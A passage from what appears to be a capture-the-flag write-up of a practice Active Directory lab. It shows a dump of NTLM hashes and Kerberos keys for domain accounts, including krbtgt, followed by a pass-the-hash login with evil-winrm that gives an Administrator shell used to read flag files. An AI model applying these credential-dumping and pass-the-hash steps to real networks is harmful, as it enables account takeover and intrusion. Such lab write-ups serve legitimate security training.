spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:e3d0f4e53b0fce2073a2ef33f2d075ca:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:6107bedbb5baabcc22813b5ffb187ca01abd47c01700016ec2b843a4c3994b54
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:cd0c0da9ee828cd342853de2a209d2f4
ATTACKTIVEDIREC$:des-cbc-md5:9426b6febf6dc2ab
[*] Cleaning up... 

Looting

└─$ evil-winrm -u Administrator -i 10.10.204.111 -H 0e0363213e37b94221497260b0bcb4fc                                                                                            1 ⨯

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents>
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> dir
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> cd ..\Desktop
dir[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt


[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> type root.txt
********
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> cd ..\..\backup\Desktop
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\backup\Desktop> dir


    Directory: C:\Users\backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt


[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\backup\Desktop> type PrivEsc.txt
******

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-admin\Desktop> dir


    Directory: C:\Users\svc-admin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-admin\Desktop> type user.txt.txt
******

GGWP!

Directory
$ cd content && tree